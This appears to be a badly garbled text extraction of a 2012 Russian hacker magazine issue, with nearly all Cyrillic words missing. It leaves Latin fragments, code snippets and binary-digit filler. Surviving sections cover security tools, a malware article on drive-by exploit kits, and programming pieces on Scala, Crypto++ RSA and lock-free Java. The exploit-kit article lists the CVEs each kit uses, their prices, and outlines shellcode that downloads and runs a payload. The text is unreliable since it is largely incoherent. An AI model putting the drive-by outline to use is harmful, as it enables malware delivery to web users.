(a.out, xcoff, nds).
:
,
backtracking , linux/windows/remote
API-, / C,
GDB- .
:

;
;
;
;
/
;

.
07 /162/ 2012
X-Tools
:
cr4sh
URL:
code.google.com/p/
ioctlfuzzer
:
Windows
:
Sebastian Porst
URL:
https://github.com/
sporst/SWFREtools
:
*nix/win
WINDOWS
IOCTL Fuzzer
Windows.
NtDeviceIoControlFile
IOCTL .
IOCTL-

.
:
GUI;
Windows 7;
:
Volatile Systems
URL:
https://www.
volatilesystems.com/
default/volatility
:
*nix/win/mac
64- Windows;
;

( IOCTL-
);
DbgCb;

;
/

.
:
Sebastian Weber
URL:
http-tunnel.sourceforge.net
:
win
FLASH
RAM
HTTP
SWFREtools Flash-. SOURCE Boston 2011 Sebastian Porst.

( )
SWF:
Flash Dissector (
SWF-);
SWF Parser (
);
Minimizer (
SWF-);
FP Debugger ( Flash
Player);
StatsGenerator (
SWF-).
Volatility ,
Python
(RAM).
,

, (,
). , :
;
;
;
DLL ;
;
;
;
;
;

.
HTTPTunnel,
, HTTP-,
HTTP GET- POST-.
, .
HTTP-,
HTTPTunnel ,
, telnet PPP,
. ,
:
Port mapping;
SOCKS4, SOCKS5;
;
- ;
;
standalone hosted-;
LDAP
MySQL.
, Flash,
:
, ;
;
;
, .
JHexView, splib Buggery.
07 /162/ 2012
,
,

Volatility.
:
,
, , . HTTP-

.
: PHP- - ,
Perl- win32-.
065
MALWARE
(drobotun@xakep.ru)
DRIVE-BY

WWW
-

DRIVE-BY
(
)
. ,
. !

drive-by ,
. , , , , , ,

CD-Man. ,
.
, , ,
. ,
,
iframe
, , JavaScript, .
, ,
.
066
-
- .
-
, ,
.
-

- ( )
.
API- URLDownloadToFile urlmon.dll,
.

- :
kernel32.dll
(
PEB);
kernel32.dll GetProcAddress;
www.exploitdb.com

.
wepawet.
iseclab.org.
,
,
,
-.
DVD

-
Malzilla.
.
API- LoadLibrary
GetProcAddress;
LoadLibrary urlmon.dll;
URLDownloadToFile
-
( WinExec
ShellExecute);

.

. , ,
- ,
,
.
07 /162/ 2012
drive-by -
JavaScript-
drive-by (: Google Anti-Malware Team)
- Exploit.HTML.IESlice.aa
Eleonore Exploit Kit
MDAC BlackHole Exploit Kit ( )
, . : ,
, -
.
(
-).
,

, - ,
. ,
, -
, ,

07 /162/ 2012
JavaScript-,
Rhino Script Engine Java (CVE-2011-3544)
,

( drive-by ,
, , ,
).
, ,

Adobe, Adobe
Reader, Java Oracle Corporation.
,
-
(, :))
Microsoft Data Access

Components (MDAC).
2006 , -
.

,
- :
Blackhole Exploit Kit;
Eleonore Exploit Kit;
Nuclear Pack;
Phoenix Exploits Kit;
Sakura Exploit Pack.
,
067
MALWARE
-
BlackHole Exploit Kit
.
malwaredomainelist.com
-. , 9097%
. , .
1.2.3, :
CVE-2006-0003 (Microsoft Data Access Components (MDAC));

CVE-2007-5659/2008-0655 (Adobe Reader Collab CollectEmailInfo);
CVE-2008-2992 (Adobe Reader JavaScript Printf Buffer Overflow);
CVE-2009-0927 (Adobe Reader Collab GetIcon);
CVE-2010-0188 (Adobe Reader LibTiff);
CVE-2010-0842 (Java JRE MixerSequencer Invalid Array Index Remote
Code Execution Vulnerability);
CVE-2010-1885 (Windows Help and Support Center Protocol Handler
Vulnerability);
CVE-2011-0559 (Adobe Flash Player Memory Corruption);
CVE-2011-3544 (Java Rhino Script Engine);
CVE-2012-0507 (Java Atomic).
( ): 1500,
1000, 700, () 50, 20, 200,
500, 200, (24 ) 50.
.
( -
BlackHole Exploit Kit ( )
) CVE-2012-0507.
AtomicReferenceArray,
Object[],
JRE.
Eleonore Exploit Kit

2009 ,
. 1.8.91. :

CVE-2006-4704 (WMI Object Broker);
CVE-2008-2463 (M508-041 MS Access Snapshot Viewer);
CVE-2010-0806 (Internet Explorer DHTML Behaviors Use After Free);
Vulnerability);
CVE-2010-4452 (Java ClassLoader Remote Code Execution);
CVE-2011-0558 (Adobe Flash Player Integer Overflow);
CVE-2011-0559 (Adobe Flash Player Memory Corruption);
CVE-2011-0611 (Adobe Flash Player Embedded .swf file);
CVE-2011-2462 (Adobe Reader U3D Object Memory Corruption);
CVE-2011-3521 (Java Update);
CVE-2011-3544 (Java Rhino Script Engine).
( ) 1000 , 50,
50, (24 ) 40.
068
Eleonore Exploit Kit ( )
07 /162/ 2012
drive-by -
Nuclear Pack
( 2010 )
( 2012 ).
,
.
:

CVE-2008-2463 (M508-041 MS Access Snapshot Viewer);
CVE-2008-2992 (Adobe Reader JavaScript Printf Buffer Overflow);
CVE-2008-4844 (Internet Explorer 7 XML Exploit);
CVE-2009-0075/0076 (MS09-002-IE7 Memory Corruption);
CVE-2009-1136 (IE OWC Spreadsheet ActiveX control Memory
Corruption);
CVE-2010-0840 (Java OBE);

Vulnerability);
900 ( ).
-
.
,
, ,
.
ifram,
OnMouseMove (
, ).
Phoenix Exploits Kit

-. 2009 .
-.
3.1. :

CVE-2008-2992 (Adobe Reader Javascript Printf Buffer Overflow);
CVE-2008-5353 (JRECalendar Java Deserialize);
CVE-2009-3867 (Java GSB);
CVE-2009-4324 (Adobe Reader doc.media.newPlayer);
CVE-2010-0886 (Java Deployment Toolkit Component);
CVE-2010-1240 (Adobe Reader Embedded EXE Social Engineering);
CVE-2010-1297 (Adobe Flash Player NewFunction Invalid Pointer Use);
CVE-2011-3544 (Java Rhino Script Engine);
CVE-2012-0507 (Java Atomic).
-, 2200 .
Phoenix Exploits Kit
Sakura Exploit Pack

. , ,
, . :
CVE-2010-0806 (IEPeers Remote Code Execution);
CVE-2010-0842 (Java JRE MixerSequencer Invalid Array Index Remote
Code Execution Vulnerability);
, , , -
MDAC-. ,
Sakura Exploit Pack
Sakura Exploit Pack
, ,
, .
: 0-day-
- . ,
,
( , , ,
Java), : . z
07 /162/ 2012
069
MALWARE
Anonymous
070
,
, .
. , .
, , .
07 /162/ 2012
- .
, ,
. , , .

20- . 26
,
.

?
- ?
, ?
, ,
.
-. -
, .
, -
, . ,
,
. ,
,
. -
, ,
.
: , ,
, , .
- .
,
,
, .
,
MALWARE-
(
10 000 )
-,
. :
, - Big Tits ,
,
. K , , ,
. ,
-,
.
,
. ,
,
0 .
,

, ,
.
, -
-
. 10 000
.
,

-.
,
,
. ,
(
,
40% ).
,
,
.
, - .
.

,

,
.
. ,

.
, ,
,
.
,
-
.
(Cybercrime
to ybercrime 2C).
DDoS-.
,
.
4
5
07 /162/ 2012
071
MALWARE
, BMW
X7.

,
.

- ,
.
, .
, .

, . .
-,
.
, , -
. -
. ,
,
,
,
,
.
, ,
. , 24 7
,
AV. , .
,
,
. , , .
-
.
. , , ,
SEO-.
,
.
,
: ,
,
.

, ,
. .
:
,
Group-IB

- -

.
: -

-.
.
.

,
.
072
:
. ,
.
, 273 (,

) . , , .
:

, . -

.
,

.
, ,
273,
272 ( ), .
: -

-. -
, ,
, -.
, ,
.
-
, ,
. ,

.
, -
07 /162/ 2012
, ,
.

,
. 50%,
. -
, .
.
,
( , , -, )
.
-,
.

, , , .
- 272 273. :
!
159 . . , , ,
.
:
-
, , .

-
07 /162/ 2012

, .
, , ,
?

.
. ,

. ,
,
, , .
, , :

,
.
,
.
, . ,
- ,
.

,
. , , ,

- . ,
. ,

, , -
, . ,
,

159- .
-
.
. .
,
,
. -,

. , .
. - . ,
, . -
.
, ,
-,
.
.

,
. -
-.
, 50%
.
,

,
. ,
.
-.

. ,

-
.
073
MALWARE

,

.
, . , -
,
EULA. ,
,
.

, .
,
, -, , .

,
, .

.
,
, .

2C?
10 000 .
, , -
. :
- 272 273. .
159- . .
INFO

:

,

.
,
, SuperWinAntivir ,
.
,
,
.
- . ,
.
, , .
, ,
.
.
, , ,
.
, .

,
.
, .
074
, , , IT.

.
- .
, .
, , ,
14 , .
, ,
, , Facebook Twitter, , ,
. z
07 /162/ 2012
Preview
94
HIGHLOAD
,
? , !
, ,
Highload.
-,
,

,
,
Facebook.
, , ,
.
76
SCALA-
JVM, Java
.
, Scala.
Highload
UNIXOID
106

, ,

suckless.org.
SYN/ACK
110

, ,
Android

Google ?
FERRUM
116
075
, UTM
,
, ,

, UTM.
128

FAQ Microsoft,
,
.
134
!
?
Intel X79 Express!
07 /162/ 2012
(twitter.com/ojowoo)
SCALA

SCALA

,

Scala ,
Java
,
, - ,

.

.
076
07 /162/ 2012
SCALA-
JVM?
JVM (Java Virtual Machine), ,
IT-. Java
. JVM . Scala
- , IT .
EPFL,
Scala , .
Scala ,
Java , , ,
,
, .
:
1. Java Virtual Machine, Java- ,
.NET LLVM.
2. Java , .
3. ,
.
4. -
, .

// 1 100
(1 to 100).sum
// "2,6"
List(1, 2, 3).filter(_ % 2 == 1).map(_ * 2).mkString(",")
// , 42
//
(1 to 1000000).par.count(_.toString.map(_.asDigit).sum == 42)
// "" : trait (
// ), - ,
// "this"
trait MyFunction[-A, +B] extends (A => B)
with Logging with Validation {
this: MyContext =>
}

Scala , ,
Generic Java, -
Java 1.5.
-
,
. Scala 2001 , 2003-
,
,
.
, ,
, Foursquare, Twitter, LinkedIn .

-
JVM .
07 /162/ 2012
Scala IDE Eclipse Scala
2011
Typesafe,
Scala-.
Typesafe Stack, , ,
SBT,
Scala IDE, - Play Akka.
.

, Scala.
,
, .
:
val list = List("a", "b", "c")//List[String]
val map = Map(1 -> "a", 2 -> "b", 3 -> "c")//Map[Int, String]
case classes, equals, hashCode, toString :

case class User(name: String, age: Int, address: Address)
case class Address(city: String, street: String)
val p = Person("Vasia", "21", Address("Moscow", "Arbat"))
(
, ,
):
// : BitSet(2, 4, 6),
BitSet(1, 2, 3).map(_ * 2)
// : Set("2", "3", "1"),
// Set, BitSet
BitSet(1, 2, 3).map(_.toString)
// : Map, 1 100
077

//
(1 to 100).groupBy(_.toString.map(_.asDigit).sum)
, ,
,
:
val i = "1".toInt // "1" java.lang.String
val date = today + 1.month + 5.days
println("%s - %d".format("Vasia", 21))
(tuples) :
def error = ("Not found", 404)
//
val (msg, code) = error
//

Java-
:
def box(width: Int = 100, height: Int = 200) = { /*...*/ }
box(height = 300) // box(100, 300)
:
lazy val data = ParseHugeFile()
//
, ( ,
):
def debug(msg: => String) = if (debugEnabled) println(msg)
// heavyMethod , debugEnabled
debug("Debug message: " + heavyMethod())
(
):
def closeResource(resource: { def close() })
{ resource.close() }
(pattern matching)

, :
val timeRegex = "(\\d{2}):(\\d{2}):(\\d{2})".r
someVar match {

,
,

JAVA-
078
case timeRegex(hh, mm, ss) => println(hh, mm, ss)

case List(a, List(1, b)) => println(a, b)
case _ => // default
}
, ,
, Scala . ,
,
Programming
in Scala (2nd edition). stackoverflow.com
google-.
, Scala
.
?

. Scala- Lift.

- Wicket, Rails, Django .
, . ,
, Lift, . ,
Foursquare, PHP
Lift, . , ,
, ,
.
, ,
,
- (Play) Scala-
, Lift, , .
- Play, , Typesafe Stack :
,
(Working hard to keep it simple).
Java--, . ,
, , - Java,
.
Scala,
, ,
, Play, Java.
. , , , ,
, .
, Play stateless-
, .
Scala- Akka
.
Typesafe Stack 2.0 , . Akka
Erlang ,
Actor, . ,
STM (Software Transactional
Memory),
, -
07 /162/ 2012
SCALA-
, deadlock
. , Dataflow Concurrency,
, .
Actor Akka ,
,
Actor
.
,

,
. Actor , , .
,
.
, Scala . Twitter
Foursquare.
,
, ,
( Play Akka) Java-.
,
,
. milestone-
Scala 2.10,
,
. , ,
, ,
. Scala-
Nemerle,
, ,
.
, Scala,
.

( ),
,
.

, , , Microsoft LINQ. Scala
Dynamic, (
), trait ,

. ,
3.0,
, 3,
, ,
, ,
.
, . z
PAUL PHILLIPS AKA DOT-COM

: ( ) Scala ,
Dot-Com.
( ) ,
, - .
Scala,
.
Typesafe , ,
.
SCALA DAYS 2012

Scala-, 500
.
Barbican .

12-
Scala . ,

. , Scala-
, . indeed.com,
Scala- 2011 .
Play Scala IDE
07 /162/ 2012
079
fft24

CRYPTO++ RSA

,
(
)

,
.
,

Crypto++,

RawRSA .
RSA
080
. , ,

, , ( ).
RSA,
, - .

, ,
(, Python)
. , Crypto++.

Crypto++
Integer,
WORD, , ( ). Crypto++ ,
, ,
, . :
,
.
07 /162/ 2012
).
, . Cryptopp ,
,
,
,

.
, ,
:
int CRYPTOPP_FASTCALL Baseline_Add(

size_t N,
word *C,
//
const word *A,
// A
const word *B)
// B
{
assert (N%2 == 0);
// WORD
Declare2Words(u);
// u
AssignWord(u, 0);
//
for (size_t i=0; i<N; i+=2)
{
AddWithCarry(u, A[i], B[i]);
C[i] = LowWord(u);
AddWithCarry(u, A[i+1], B[i+1]);
C[i+1] = LowWord(u);
}
return int(GetCarry(u));
}

,
friend- PositiveSubstract
PositiveAdd.
. .

,
, Toom Cook
.
,
O(n^2)
, O(n^1,5849), .
Crypto++
.

void RecursiveMultiply(
word *R,
word *T,
const word *A,
const word *B,
size_t N)
{
// :
// < 8,
if (N <= s_recursionLimit)
s_pMul[N/4](R, A, B);
else
{
// (A = A0 + A1*x)
...
// R
// N/2 (R[0123])
// R[23] = A1*B1
RecursiveMultiply(R2, T2, A1, B1, N2);
// T[01] = (A1-A0)*(B0-B1)
RecursiveMultiply(T0, T2, R0, R1, N2);
// R[01] = A0*B0
RecursiveMultiply(R0, T2, A0, B0, N2);
//
// ,
int c2 = Add(R2, R2, R1, N2);
int c3 = c2;
c2 += Add(R1, R2, R0, N2);
c3 += Add(R2, R2, R3, N2);
if (AN2 == BN2)
c3 -= Subtract(R1, R1, T0, N);
else
c3 += Add(R1, R1, T0, N);
(a + bx)(c + dx) = ac + (ac + bd (a b)(c d))x + bdx^2
. A
A = A0 + 2^(N/2)*A1 ( N
N/2 ), A0*B0, A1*B1, (A0-A1)*(B0-B1).
.
N N/2
/, (
RSA,
6 ( p N)
07 /162/ 2012
c3 += Increment(R2, N2, c2);

assert (c3 >= 0 && c3 <= 2);
Increment(R3, N2, c3);
}
}
,
,
OAEP, Timing attack
OAEP
081

(
: goo.gl/rAAkE).

.
, ( ). : m e,
e=(e[k], e[k-1], ...,
e[0]) = e[k]*2^k + ... + e[1]*2 + e[0].
:
s[1] = m
for i = 1,2,...,k
s[i+1] = (s[i]^2)*m^(k-i)
, ,
n, O(log n).

(
). Crypto++
,
, .

(goo.gl/qkZpi).
RSA
RSA 1980- : (Ronald Linn Rivest),
(Adi Shamir) (Leonard Adleman). RSA
. RSA (one-way trapdoor
function), , ,
() . RSA trapdoor function
:
x -> xê mod N
N = p*q .
RAWRSA
, RSA, RawRSA.
-
( ), - ,
. RawRSA
RSA-OAEP, RSA-OAEP+,
RSA-SAEP+ . RawRSA
: p q,
N=p*q,
p(N) = (p-1)(q-1).
e d, , e*d = 1 mod p(N).
(e, N) , (d, N) . (d,
p, q). m (1 <= m < N) (e, N) :
s = mê mod N
s (d, N) -
082
m
:
m = s^d mod N
RAWRSA
/
RawRSA
Crypto++ (RawRSA
). :
Integer& RawRsaEncrypt(Integer& m, Integer& N, Integer& e)
{
RSA::PublicKey pubKey;
pubKey.Initialize(N, e);
return (pubKey.ApplyFunction(m));
}
, . :
Integer& RawRsaDecrypt(Integer& s, Integer& N,
Integer& e, Integer& d)
{
RSA::PrivateKey privKey;
AutoSeededRandomPool prng;
privKey.Initialize(N, e, d);
return (privKey.CalculateInverse(prng, s));
}
, RawRSA: s (
) d N,
e s N. CalculateInverse
, ,
d, e, p, q. ,
, p q,
, N
Initialize ( e d).
RSA-OAEP
, RawRSA
, 1994
(Mihir Bellare)
(Phillip Rogaway) RSA, OAEP Optimal
Asymmetric Encryption Padding.
PKCS#1 ( v2.0)
.
, ,
.

, ,

. :
,
,
.

. RSA-OAEP

. RSA-OAEP
RawRSA .
RSA-OAEP (, AES 128 ) , N,
:
07 /162/ 2012

:
18-28

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

step@real.xakep.ru

m || 01 || 00000... || rand
//
size_t ecl = encryptor.CiphertextLength(plaintext.size());
SecByteBlock ciphertext( ecl );
rand . H G :
((m || 01 || 00000...) xor rand H(rand)) ||
(rand xor G(msg || 01 || 00...))
RawRSA. - H G
SHA-256, . RSA-OAEP,
AES, RSAES-OAEP
Crypto++ RSAES_
OAEP_Encryptor RSAES_OAEP_Decryptor,
.
, :
//
AutoSeededRandomPool rng;
InvertibleRSAFunction parameters;
parameters.GenerateRandomWithKeySize( rng, 1536 );
RSA::PrivateKey privateKey( parameters );
RSA::PublicKey publicKey( parameters );
//
encryptor.Encrypt( rng,
plaintext,
plaintext.size(),
ciphertext );
RSAES_OAEP_SHA_Decryptor decryptor( privateKey );
//
size_t dpl = decryptor.MaxPlaintextLength(
ciphertext.size() );
SecByteBlock recovered( dpl );
DecodingResult result = decryptor.Decrypt( rng,
ciphertext, ciphertext.size(), recovered );
, .
, Crypto++ ,
.

Cryptopp,
, RSA. ,
Cryptopp
, , , . z
// 128
static const int SECRET_SIZE = 16;
SecByteBlock plaintext( SECRET_SIZE );
memset( plaintext, 'A', SECRET_SIZE );
RSAES_OAEP_SHA_Encryptor encryptor( publicKey );
INFO
RSA

N.

.

.
( N),
mê < N, mod
N,
e mê
.
e = 2^16 + 1.
,
d,
, ,
(Michael J. Wiener).
RSA d < N^0,25.
Timing-,
, ,
,
d.
(Paul Kocher) 1999
RSA -.
,
.
Power attack.
1
2
084
Fault attack RSA.

,
.
N,
. ,

, 15%
, .
.
RSA
,
seed. -
p q
,
N1 N2 .
(Nadia Heninger) (Arjen Lenstra)
,
N 0,4%
HTTPS-.
.

p q,
,
.

.
PKCS Public
Key Cryptography
Standard
,
RSA Data
Security.
07 /162/ 2012
!
8-800-200-3-999
+7 (495) 663-82-77 ()

40 % .
6 1194 .
12 2149 .
6 810 .
12 1499 .
6 1110 .
12 1999 .
6 894 .
12 1699 .
6 564 .
13 1105 .
6 599 .
12 1188 .
6 1110 .
12 1999 .
6 810 .
12 1499 .
3 630 .
6 1140 .
6 895 .
12 1699 .
6 690 .
12 1249 .
6 775 .
12 1399 .
6 1110 .
12 1999 .
6 1110 .
12 1999 .
6 950 .
12 1699 .
shop.glc.ru
(ivinside.blogspot.com)
(alex@skazo4neg.ru)

,

.
<Enter>,
Java, Python Linux. !
1
,
( <Enter>
)?
<Enter> , !
(
),
, - .
,
086
. ,
<Enter> .
. ,
. IP-
. DNS, DNS- , IP
site.ru,
.
(http://site.ru) (site.ru:81),
80- HTTP-.
, :
07 /162/ 2012
$ telnet site.ru 80
GET / HTTP/1.1
Host: site.ru
GET
site.ru. , , User-Agent, Accept, Connection .
Live HTTP Headers Firefox,
. , HTTP/1.1
200 Ok , , .
2
access- -,
..
[10/Jul/2010:00:13:18 +0400] pogoda.yandex.ru 2.2.2.2 "GET
/chernigov HTTP/1.1" 200 "http://www.yandex.ua/"
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0)" 113
/russia HTTP/1.1" 200 "http://pogoda.yandex.ru/27612/
choose/" "Opera/9.52 (Windows NT 6.0; U; MRA 5.5
(build 02842); ru)" 119
/ HTTP/1.1" 302 "http://www.yandex.ru/"
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;
.NET CLR 3.0.30729; InfoPath.2)" 203
, ,
:
1. -3 , (/) (/moscow),
;
2. 95% ( )
(/kiev).
1. Linux.
,
, (/)
(/moscow).
: GET / HTTP/1.1 GET /moscow HTTP/1.1.
egrep, , | ().
. ,
,
( , access.log ,
,
User-Agent, ,
).
,
User-Agent. cut ( awk, sed).
,
. sort uniq. ,
, .
, head
07 /162/ 2012
.
-:
egrep 'GET / HTTP/1.1|GET /moscow HTTP/1.1' ./access.log
| cut -d ' ' -f 9 | sort | uniq -c | head -3
2. , Python:
timelist = []
#
for line in open('access.log'):
#
if 'GET /kiev HTTP/1.1' in line:
#
line = line.split(' ')
#
timelist.append(line[-1].strip())
#
timelist.sort()
# ,
# 95%
print timelist[int(len(timelist) * 0.95)]
3
Java lock-free BigInteger next(), . .
.
0, 1, 1, 2, 3,
5, 8, 13, ...,
.
F(n)
F(0) = 0, F(1) = 1, F(n) = F(n 1) + F(n 2), n >= 2
, F(n 1) F(n 2) , , . (synchronized

java.util.concurrent.locks.Lock),
lock-free-. , lockfree- ,
. ,
, , ,
, , .
.
:
1. .
2. .
3. CAS
(compareAndSwap/compareAndSet) .
4. 1.
,
- .

compareAndSwap ( ),
:
087

boolean compareAndSet(int store,
int expected,
int newValue)
{
if (store == expected) {
store = newValue;
} else {
return false;
}
}
// 2.
next = current.calculateNext();
// 3.
// CAS-
// 4. 1
} while(!state.compareAndSet(current, next));
//
//
return current.prevNumber;
}
}
,
( , store, ).
Java , .
1.5 Java java.util.
concurrent.atomic, AtomicBoolean,
AtomicInteger ; , CAS (compareAndSet,
incrementAndGet ).
AtomicBigInteger, , (F(n 1), F(n 2)) . ,
,
, AtomicReference
.
public class LockFreeFib {
// immutable- F(n 1), F(n 2)
//
private static class PrevFibNumbers {
//
// final
private final BigInteger currentNumber;
private final BigInteger prevNumber;
protected PrevFibNumbers(BigInteger currentNumber,
BigInteger prevNumber) {
super();
this.currentNumber = currentNumber;
this.prevNumber = prevNumber;
}
//
//
// PrevFibNumbers
public PrevFibNumbers calculateNext() {
return new PrevFibNumbers(
currentNumber.add(prevNumber), currentNumber);
}
}
private AtomicReference<PrevFibNumbers> state =
new AtomicReference<PrevFibNumbers>(
new PrevFibNumbers(BigInteger.ONE, BigInteger.ZERO));
/*
*
*
*/
public BigInteger next() {
PrevFibNumbers current = null;
PrevFibNumbers next = null;
do {
// 1.
current = state.get();
088
, ,
, . CAS
( ) ,
- .
4
,
.
, ,
. 100 , 99 101 . , , , .
. ?
,
, . : .
, , , .
,
100 , .
: 100 , 99 .
,
. : 99 .
: 99
. : . z

1. ,
.
. ,
?
2. 100 . 99%.
98%. ?
: , , , /. .
3. -
: ERROR at line 15: ORA-01790: expression must have
same datatype as corresponding expression.
?
?
,
? , ,
?
4. ,
?
07 /162/ 2012
deeonis (deeonis@gmail.com)

- .
,

. ,
?

.
.
090
, ,
, .

. ,
.
, , , .
, , .

class User
{
public:
User(string login, string password)
: m_login(login), m_password(password)
{
};
~User();
string getLogin() { return m_login; }
string getPassword() { return m_password; }
void setLogin(string login) { m_login = login; }
void setPassword(string password) { m_password = password; }
// ...
private:
string m_login;
string m_password;
}
07 /162/ 2012
. User , login, password .

,
. , , , ,
.
, , .
, ,
, ,
, ,
.
, ,
- AdminUser. .

class AdminUser
{
public:
AdminUser(string login, string password)
{};
~AdminUser();
// getXXX setXXX
// User
// ,
private:
string m_login;
string m_password;
}

class UserBase
{
public:
{
};
~User();
virtual string getLogin() { return m_login; }
virtual string getPassword() { return m_password; }

AdminUser,
User. , ,
, ,
.

const int SIMPLE_USER = 1;
const int ADMIN_USER = 2;
int userType;
string login;
string password;
// userType, login, password
//
if (userType == SIMPLE_USER)
{
User user(login, password);
}
else if (userType == ADMIN_USER)
{
AdminUser user(login, password);
}
,
,
.
.
BaseUser ,
. ,
.
07 /162/ 2012
virtual void setLogin(string login) { m_login = login; }

virtual void setPassword(string password) {
m_password = password; }
// ...
private:
string m_login;
string m_password;
}
class User : public UserBase
{
public:
: UserBase(login, password)
{
};
virtual ~User();
// ,
//
}
class AdminUser : public UserBase
{
public:
AdminUser(string login, string password)
: UserBase(login, password)
{
};
virtual ~AdminUser();
091

(AdminUser, User )
. ,
. -
. , .
.
-
,
. ,
, . .

class UserFactory
{
public:
// ...
UserBase* createUser(int userType, string login,
string password)
{
BaseUser *user;
switch (userType)
{
case ADMIN_USER:
user = new AdminUser(login, password);
break;
case SIMPLE_USER:
user = new User(login, password);
break;
}
return user;
}
}
Python
// ,
//
}
//
UserBase *user;
if (userType == SIMPLE_USER)
{
user = new User(login, password);
}
else if (userType == ADMIN_USER)
{
user = new AdminUser(login, password);
}
.
- ,
. -,
- .

,
, . .
,
,
, -, , . , , .
,
092
, ? UserFactory,
-
createUser(). ,
, , .
, , .
createUser() .
.
.
.
.
.
. ,
. ,
, .

AdminUser *admin;
UserFactory uf();
admin = uf.createUser(ADMIN_USER, login, password);
.
. ,
- ,
. z
07 /162/ 2012
- Digital Photo School
Digital Photo ,
; ;
. , ,

. ,
Samsung,
- Digital Photo School.
,
-,
. ,

Samsung NX.
16
,
, . ,
digital-photo.ru/school/
,
. , , ,
,

. .
- , .
- ,
,
-,

Samsung . ,
,
-,
Digital
Photo School. , DVD Digital Photo.
Digital Photo School
(8 ) 02.06.2012 15.01.2013
7 - 23.06.2012 15.12.2012
2013
DIGITAL-PHOTO.RU/SCHOOL/
Digital Photo School

2013 , 50
.
Digital
Photo School Samsung NX200.

. Samsung
NX ,

.
NX200
, .
-
,

, ,

,
.

, ,
, , Photosight.ru .

.
,

.
,

094
09
94
07 /162/ 2012
. 1
,
, , ,

.
-
. , , , , ,
, .
,
, , ,
,
.

-
, ,
.
-.
.
,
, ,
, -
.

CommuniGate Pro. ,
.
,
.
, -
.
.
. ,
.
.
, ,
- . .
07 /162/ 2012
, ,
Facebook. . ,

. ,
(, ,
, ) ,
.
.
,
:
? ,
?
, ,
,
Amazon. ,

.
,
: ! Amazon

-,
cloud-.
-
,
:
,
Amazon, ,
?

- -
.
,

,
,
.
. ,
,
.
, .
.
- , ,
. , ,
,
-
, ,
.
,
.
, ,
, PHP. ,
CGI script - .
, CGI script
,
.
- ,

: ,
. API -
095
, ,
,

.

,
,
,
,
.

.

, ,
. , ,
,

.
, .

.
,
-

.
:
,
, ,

.
: REST API HTTP
.
,
.
: Erlyvideo,

.
Erlang.

, ,
096
,
: . ? ,

, ,

.
-.

-
. ,
.
,
, . .
Google
.
- :
?

?, , ,
: .
big data,
.
,
.
,

,
,
.
.
,
,
Google+. -
07 /162/ 2012
. 1
,
,
.
Facebook, Google, . , ,
, ,
-. .
? - -
. , , ,
, .
, , , , ,
.
,
, .
- , , ,
, .
, , . -,
.
.
,
, , ,
, ,
. , DYNAMODB
AMAZON
07 /162/ 2012
.
,
,
: !

(, ,
-
),
,
,

.

Facebook, , -,
- ejabberd-.

.
,
.
,
,
. ,
:
100 .
, .

, ,
,

,
,

.
, .

,
,
, 20. ,
,
,
,
,
,
.

.
,
097

. -
,

. , DynamoDB
Amazon
. DynamoDB Cassandra, Hadoop .
, ,
DynamoDB, .
, . Google
- . ,
,
, , DeNA ()
.
, .
- , ,
, Not invented here.

, - .
, Google Translate ,
-, ,
. Microsoft,
.
.
. ,
, ,
, ,
. ,
, , big data
web scale, ,
usability, .
, .

,
.

.

, .
,
.

,
, ,
. ,
Stack Overflow.
.
,
? ,
, ,
, , . -
.

,
.
.
,

. ?

. ,
. , ,
,
. .
?

. .
- .
, .
, .
, .
.
098
07 /162/ 2012
. 1
, ,
, - . -
.
,
, . , ,
. , - ,
,
cron .
, ,
.

,
. , .
, - .
.
, ,
,
( , ). ,
( ), .
,
, , , , , , .
, , - .
, , , .
, ,
. ,
. .
, . z
HIGHLOAD-

Highload.

,

-.

HighLoad++ (www.highload.ru).
,
,

.

.

,

MySQL,
. MySQL
.
MySQL 5.5.
Mail.Ru
NoSQL Tarantool, 500600
.
open-source
.
,
,

.
Erlyvideo
(erlyvideo.org). , .

.

, ( ,
Mail.Ru). ,

60 .
-

.
,

,
.
-

, ,
-
.
07 /162/ 2012
099
1
1.
1.1.
1.2.
2.
4

:

-
2.1.
2.2.
2.3.
3.
2
4.
4.1.
4.1.1.
4.1.1.1.
4.1.2.
4.1.3.
4.2.
4.3.
4.4.

,

CDN

Heartbeat, CARP-

3
5.
5.1.
5.2.
5.2.1.
5.2.2.
5.2.3.
5.2.4.
5.3.
5.3.1.
5.3.2.
5.3.3.
5.4.
5.5.
100

Share-nothing
6.
6.1.
6.2.
6.3.
5
7.
7.1.
7.2.
7.3.
7.3.1.
7.3.2.
7.3.3.
7.4.
7.5.
7.6.
7.6.1.
7.7.
7.8.

(, NoSQL)

6
8.
8.1.
8.2.
8.3.
9.
9.1.
Dev-ops ( )

9.2.
9.3.
10.
10.1.
10.2.
10.3.

Push- (, ,
)
07 /162/ 2012

.

.
-,
.
.
TSW ,
. ,

, .

TSW.
-, ,
, . -

( )
. , . 14/2
(495) 231-4383
. , . 29
(499) 724-8044

-, . 1
(812) 603-2610

TSW.
,
( ),
.

( ,
),
. ,
TSW,
.
. , . 10, . 32,
(495) 231-2363
www.kolrad.ru

www.allrad.ru
(495)730-2927/368-8000/672-7226
www.prokola.net
(812)603-2610/603-2611
UNIXOID
GNOME: GTK+
SHELL
GNOME ,
, .
, GNOME ,

.
010101010101000100100101010110010001001000
0100010010010101011001
001000100100011110101110001110110101001001
(execbit.ru)
10001111010111000111011
011010100100100111101010101010100010010010
0010011110101010101010
010001001001010101100100010010001111010111
0101010101000100100010101011001000100100
1000111101011100011101101010010010011110101
0100010010001111010111000111011010100100
100100111101010101010100010010010101011001
1101010010010011110101010101010001001001
1001010101100100010010001111010111000111011
1000100100101010110010001001000111101011
1011100011101101010010010011110101010101010
000111101011100011110110101001001001111010
101010101010100010010010101011001000100100
11011010100100100
0010011110101010101010001001001010101100
100100010010001111010111000111011010100100
01010001001001010
01010101100100010001000111101011100011101
1101101010010010011110101010101010001001001
001000111101011100
1110001110110101001001001111010101010101
0101000100100101010110010001001000111101011
0010010011110101010
111101010101010100010010010101011001000100100011110101110001110
101010101010001001001010101100100010010
0100011110101110001110110101001001001111010
010010101011001000
010110010001001000111101011100011101101010010010011110101010101
001000100100011110
010010011110101010101010001001001010101100
1010111000111011010
00111011010100100100111101010101010100010010010101011001000100
011010100100100111
111010101010101000
101010100010010010101011001000100100011110101110001110110101001
011001000100100011
001001000111101011100011101101010010010011110101010101010001001
0111011010100100100
101001001001111010101010101000100100101010110010001001000111101
010101000100100101
